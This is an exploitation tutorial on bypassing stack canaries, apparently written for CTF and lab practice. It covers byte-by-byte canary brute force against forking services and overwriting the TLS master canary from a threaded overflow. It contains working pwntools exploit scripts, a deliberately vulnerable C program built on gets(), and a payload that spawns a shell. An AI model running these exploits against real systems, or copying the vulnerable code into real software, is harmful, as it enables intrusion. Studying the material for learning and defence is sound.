
BF Forked & Threaded Stack Canaries


If you are facing a binary protected by a canary and PIE (Position Independent Executable), you probably need to find a way to bypass both.

[!NOTE] Note that checksec might not detect that a binary is protected by a canary if it was statically compiled and checksec is not able to identify the canary-check function. However, you can spot the protection manually: a value is saved on the stack at the beginning of a function and that value is checked before the function returns.

Brute force Canary

The best way to bypass a simple canary is when the binary is a network service that forks a child process every time a new connection is established. A forked child inherits a copy of the parent's memory, so every connection is checked against the same canary.

In that case the canary can be brute-forced byte by byte: a guessed byte is correct if the program continues its regular flow, and wrong if the program crashes. In this example the function brute-forces an 8-byte canary (x64) and distinguishes a correctly guessed byte from a bad one by checking whether the server sends a response back (in other situations a try/except could be used instead):

Example 1

This example is implemented for 64 bits but can easily be adapted to 32 bits.

from pwn import *

def connect():
    # Open a fresh connection; each one is served by a newly forked child
    return remote("localhost", 8788)

def get_bf(base):
    canary = b""

    while len(canary) < 8:
        # Try every possible value (0x00-0xff) for the next canary byte
        for guess in range(0x100):
            r = connect()

            r.recvuntil(b"Username: ")
            r.send(base + bytes([guess]))

            # A reply means the child survived the canary check
            if b"SOME OUTPUT" in r.clean():
                print("Guessed correct byte:", format(guess, '02x'))
                canary += bytes([guess])
                base += bytes([guess])
                r.close()
                break

            r.close()
        else:
            # No value was accepted: stop instead of looping forever
            raise RuntimeError("No candidate byte was accepted")

    print("FOUND:\\x" + '\\x'.join("{:02x}".format(c) for c in canary))
    return base

canary_offset = 1176
base = b"A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base)      # Junk data + canary
CANARY = u64(base_canary[-8:])  # Extract the canary (last 8 bytes)
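The byte-at-a-time search can also be tried offline, without a target. The following is only a sketch under stated assumptions: `make_oracle` and `brute_force` are hypothetical helpers, the "service" is a local function that answers whether a partial overwrite would survive, and the secret is assumed to begin with a null byte, as in the canary value 0x493fdc653a156800 shown in the GDB output later on this page.

```python
import os

CANARY_LEN = 8  # x64 canary size

def make_oracle(secret: bytes):
    """Simulate a forking service: every 'connection' is checked against the same canary."""
    def survives(guess_prefix: bytes) -> bool:
        # A partial overflow only clobbers the first len(guess_prefix) canary bytes,
        # so the child survives exactly when those bytes match.
        return secret[:len(guess_prefix)] == guess_prefix
    return survives

def brute_force(survives, length=CANARY_LEN):
    """Recover the canary one byte at a time, counting how many probes were needed."""
    known = b""
    attempts = 0
    while len(known) < length:
        for guess in range(0x100):
            attempts += 1
            if survives(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("oracle rejected every byte value")
    return known, attempts

# Assumption: first byte is null, remaining bytes are random
secret = b"\x00" + os.urandom(CANARY_LEN - 1)
recovered, attempts = brute_force(make_oracle(secret))
print(recovered.hex(), attempts)
```

Because each byte is confirmed independently, the search needs at most 8 * 256 = 2048 probes, instead of the 2^64 guesses a whole-value search would require.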

Example 2

This is implemented for 32 bits, but it can easily be changed to 64 bits. Also note that in this example the program first expects a byte indicating the size of the input, followed by the payload.

from pwn import *

# Brute-force the canary one byte at a time
def breakCanary():
    known_canary = b""
    len_bytes_to_read = 0x21

    for j in range(0, 4):
        # Try all 256 possible values (0x00-0xff) for the current byte
        for test_canary in range(0x100):
            print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")

            # Send the current input size
            target.send(len_bytes_to_read.to_bytes(1, "little"))

            # Send this iteration's canary guess
            target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))

            # Read the output and check whether the guess was correct
            output = target.recvuntil(b"exit.")
            if b"YUM" in output:
                # Correct guess: record the byte, grow the input size, and move on to the next byte
                print(" - next byte is: " + hex(test_canary))
                known_canary = known_canary + test_canary.to_bytes(1, "little")
                len_bytes_to_read += 1
                break

    # Return the canary
    return known_canary

# Start the target process
target = process('./feedme')
#gdb.attach(target)

# Brute force the canary
canary = breakCanary()
log.info(f"The canary is: {canary}")
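The size-prefixed framing used in Example 2 can be isolated in a small helper, which makes it easier to see why the size grows by one for every recovered byte. This is a sketch only: `build_probe` is a hypothetical name, and the 0x20 bytes of padding are taken from the example above.

```python
def build_probe(known_canary: bytes, guess: int, pad_len: int = 0x20) -> bytes:
    """Return: one size byte + padding + known canary bytes + one guessed byte."""
    body = b"0" * pad_len + known_canary + bytes([guess])
    if len(body) > 0xff:
        raise ValueError("body does not fit in a one-byte length prefix")
    # The size byte must cover the padding plus every canary byte being overwritten
    return bytes([len(body)]) + body

first_probe = build_probe(b"", 0x41)
later_probe = build_probe(b"\x00\x11", 0x22)
print(hex(first_probe[0]), hex(later_probe[0]))
```

With no known bytes the size is 0x21 (padding plus one guess), which matches the initial `len_bytes_to_read` in the example.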

Threads

Threads of the same process also share the same canary value, so it is possible to brute-force a canary if the binary spawns a new thread every time an attack attempt is made.

Moreover, a buffer overflow in a threaded function protected with a canary can be used to overwrite the master canary that the check reads. As a result, the mitigation is useless because the check compares two canaries that are the same (although both modified).
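The reasoning can be modelled in a few lines. This is a toy model, not real exploit code: `epilogue_check` is a hypothetical stand-in for the comparison a protected function performs before returning, and the byte strings are arbitrary example values.

```python
def epilogue_check(stack_canary: bytes, master_canary: bytes) -> bool:
    """Model of the function epilogue: pass only if the stack copy equals the master copy."""
    return stack_canary == master_canary

original = bytes.fromhex("0068153a65dc3f49")  # arbitrary example canary
attacker = b"BBBBBBBB"                        # value written by the overflow

# The overflow reaches only the stack copy: the mismatch is detected
only_stack = epilogue_check(attacker, original)

# The overflow reaches both copies: the check passes although the canary was destroyed
both = epilogue_check(attacker, attacker)

print(only_stack, both)
```

The attacker never needs to learn the original value, only to write the same bytes in both places.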

Example

The following program is vulnerable to a buffer overflow, but it is compiled with a canary:

#include <pthread.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

// gcc thread_canary.c -no-pie -l pthread -o thread_canary

void win() {
    execve("/bin/sh", NULL, NULL);
}

void* vuln() {
    char data[0x20];
    gets(data);
}

int main() {
    pthread_t thread;

    pthread_create(&thread, NULL, vuln, NULL);
    pthread_join(thread, NULL);

    return 0;
}

Notice that vuln is called inside a thread. In GDB we can take a look at vuln, specifically, at the point where the program calls gets to read input data:

gef> break gets
Breakpoint 1 at 0x4010a0
gef> run
...
gef> x/10gx $rdi
0x7ffff7d7ee20: 0x0000000000000000      0x0000000000000000
0x7ffff7d7ee30: 0x0000000000000000      0x0000000000000000
0x7ffff7d7ee40: 0x0000000000000000      0x493fdc653a156800
0x7ffff7d7ee50: 0x0000000000000000      0x00007ffff7e17ac3
0x7ffff7d7ee60: 0x0000000000000000      0x00007ffff7d7f640

The above shows the memory at the address of data, where the program will write user input. The stack canary is found at 0x7ffff7d7ee48 (0x493fdc653a156800), the saved $rbp at 0x7ffff7d7ee50, and the return address at 0x7ffff7d7ee58 (0x00007ffff7e17ac3):

gef> telescope $rdi 8 -n
0x7ffff7d7ee20|+0x0000|+000: 0x0000000000000000  <-  $rdi
0x7ffff7d7ee28|+0x0008|+001: 0x0000000000000000
0x7ffff7d7ee30|+0x0010|+002: 0x0000000000000000
0x7ffff7d7ee38|+0x0018|+003: 0x0000000000000000
0x7ffff7d7ee40|+0x0020|+004: 0x0000000000000000
0x7ffff7d7ee48|+0x0028|+005: 0x493fdc653a156800  <-  canary
0x7ffff7d7ee50|+0x0030|+006: 0x0000000000000000  <-  $rbp
0x7ffff7d7ee58|+0x0038|+007: 0x00007ffff7e17ac3 <start_thread+0x2f3>  ->  0xe8ff31fffffe6fe9  <-  retaddr[2]

Notice that these stack addresses do not belong to the main stack ([stack]) but to a separate mapping that holds the thread's stack and its TLS:

gef> vmmap stack
[ Legend:  Code | Heap | Stack | Writable | ReadOnly | None | RWX ]
Start              End                Size               Offset             Perm Path
0x00007ffff7580000 0x00007ffff7d83000 0x0000000000803000 0x0000000000000000 rw- <tls-th1><stack-th2>  <-  $rbx, $rsp, $rbp, $rsi, $rdi, $r12
0x00007ffffffde000 0x00007ffffffff000 0x0000000000021000 0x0000000000000000 rw- [stack]  <-  $r9, $r15

The thread's stack sits in the same mapping as the Thread Local Storage (TLS), at lower addresses, and the TLS is where the master canary is stored:

gef> tls
$tls = 0x7ffff7d7f640
...
---------------------------------------------------------------------------- TLS ----------------------------------------------------------------------------
0x7ffff7d7f640|+0x0000|+000: 0x00007ffff7d7f640  ->  [loop detected]  <-  $rbx, $r12
0x7ffff7d7f648|+0x0008|+001: 0x00000000004052b0  ->  0x0000000000000001
0x7ffff7d7f650|+0x0010|+002: 0x00007ffff7d7f640  ->  [loop detected]
0x7ffff7d7f658|+0x0018|+003: 0x0000000000000001
0x7ffff7d7f660|+0x0020|+004: 0x0000000000000000
0x7ffff7d7f668|+0x0028|+005: 0x493fdc653a156800  <-  canary
0x7ffff7d7f670|+0x0030|+006: 0xb79b79966e9916c4  <-  PTR_MANGLE cookie
0x7ffff7d7f678|+0x0038|+007: 0x0000000000000000
...

[!NOTE] Some of the above GDB commands are defined in an extension called bata24/gef, which has more features than the usual hugsy/gef.

As a result, a large buffer overflow can overwrite both the stack canary and the master canary in the TLS. This is the offset from the buffer to the master canary:

gef> p/x 0x7ffff7d7f668 - $rdi
$1 = 0x848
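All the offsets used by the exploit can be re-derived from the addresses in the GDB output above. The sketch below only redoes that arithmetic; the addresses are specific to that debugging session and the variable names are illustrative.

```python
# Addresses copied from the GDB session above (they change between runs and systems)
data_addr          = 0x7ffff7d7ee20  # $rdi at the gets breakpoint
stack_canary_addr  = 0x7ffff7d7ee48  # stack copy of the canary
ret_addr_slot      = 0x7ffff7d7ee58  # slot holding the return address
tls_base           = 0x7ffff7d7f640  # $tls
master_canary_addr = 0x7ffff7d7f668  # master canary inside the TLS

offsets = {
    "stack canary": stack_canary_addr - data_addr,
    "return address": ret_addr_slot - data_addr,
    "master canary": master_canary_addr - data_addr,
    "canary within TLS": master_canary_addr - tls_base,
}

for name, off in offsets.items():
    print(f"{name}: {off:#x}")
```

The master canary lies 0x28 bytes into the TLS block, and the whole distance from the buffer is 0x848 bytes, which is what makes a single linear overflow sufficient here.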

This is a short exploit to call win:

from pwn import *

context.binary = 'thread_canary'

payload  = b'A' * 0x28                    # buffer overflow offset
payload += b'BBBBBBBB'                    # overwriting stack canary
payload += b'A' * 8                       # saved $rbp
payload += p64(context.binary.sym.win)    # return address
payload += b'A' * (0x848 - len(payload))  # padding
payload += b'BBBBBBBB'                    # overwriting master canary

io = context.binary.process()
io.sendline(payload)
io.interactive()
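The payload layout can be sanity-checked without pwntools or the binary. In this sketch `WIN_ADDR` is a hypothetical placeholder, not the real address of win, and `struct.pack` stands in for `p64`; the offsets are the ones measured in the GDB session above.

```python
import struct

WIN_ADDR = 0x401156            # hypothetical placeholder, not taken from the binary
MASTER_CANARY_OFFSET = 0x848   # distance from the buffer to the master canary
FAKE_CANARY = b"BBBBBBBB"

payload  = b"A" * 0x28                      # fill the buffer up to the stack canary
payload += FAKE_CANARY                      # stack copy of the canary
payload += b"A" * 8                         # saved $rbp
payload += struct.pack("<Q", WIN_ADDR)      # return address (little-endian, 8 bytes)
payload += b"A" * (MASTER_CANARY_OFFSET - len(payload))
payload += FAKE_CANARY                      # master canary in the TLS

stack_copy = payload[0x28:0x30]
master_copy = payload[MASTER_CANARY_OFFSET:MASTER_CANARY_OFFSET + 8]
ret = struct.unpack("<Q", payload[0x38:0x40])[0]

# gets stops reading at a newline, so the payload must not contain one
has_newline = b"\n" in payload

print(stack_copy == master_copy, hex(ret), has_newline)
```

Both canary slots receive the same bytes, so the comparison before the function returns succeeds and execution continues to the overwritten return address.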

Other examples & references